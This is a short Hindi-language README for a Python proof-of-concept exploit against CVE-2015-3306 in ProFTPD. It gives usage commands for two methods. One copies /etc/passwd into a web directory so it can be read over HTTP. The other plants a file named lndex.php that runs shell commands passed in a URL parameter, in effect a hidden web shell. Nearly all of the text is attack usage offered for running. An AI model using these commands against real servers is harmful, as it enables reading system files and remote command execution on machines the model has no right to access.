
CVE-2015-3306 का शोषण करने हेतु उपकरण
Daniel Aldana द्वारा CVE-2015-3306 शोषण हेतु PoC। बग Vadim Melihow द्वारा रिपोर्ट किया गया।
###विधि 1:
उपयोग:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
उदा:
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
फिर प्रयास करें:
http://127.0.0.1/pass.txt
###विधि 2:
उपयोग:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
उदा:
python cpx_proftp.py 127.0.0.1 /var/www/html
फिर प्रयास करें:
http://127.0.0.1/lndex.php?img=ls